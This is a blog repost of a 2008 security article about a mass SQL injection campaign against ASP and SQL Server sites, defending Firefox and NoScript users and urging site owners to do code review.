Skip to content

Hence I think, with what is written this is the best!! Many Thanks

7-5-2008

I must Give credit here among all the scares of the internet out there today, Giorgio has assured me that the configurations, that are set at this site will defend you and your computer.  Thanks That Planet web security. Giorgio M!

SANS is reporting a new wave of the mass SQL injection automated attack against MS ASP + MS SQL Server web sites.

To my surprise and disappoint, first commenter on the SANS diary entry wrote:

If you’re using Firefox, exploited sites may reach out and “touch” you even before you look at cached pages, unless you’ve manually disabled “network.prefetch-next” in “about:config” Check out http://www.google.com/help/features.html#prefetch for more information.

Such a statement is obviously misleading, since no remote code gets executed when pages are prefetched: the raw content is are just stored in cache for faster access, and cannot do any harm.

Furthermore, if you’re using Firefox you’re immune from exploits targeted to Internet Explorer vulnerabilities, which are a very common payload, and if you’re running NoScript you won’t be “touched” by any part of this attack: the initial malicious script of the chain is prevented from loading, and even if it wasn’t, the plugin-based exploitation attempts would have been blocked anyway.

On a side note, I’ve updated the post-mortem cleanup SQL script I attached with no guarantee in my previous post for site administrators, after reader Scott reported that it was not working properly. Now it’s debugged and “tested” on SQL Server 2005 (should work on other versions as well).

But again: if you own a web site, a serious code review to eliminate SQL injection opportunities is mandatory, unless you want your site to get reinfected on next round. It’s happening right now…

Article Link: http://hackademix.net/2008/05/07/mass-attack-updates/

Link to this Article

Other suff you may wish to be aware of…..

Advertisements
No comments yet

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: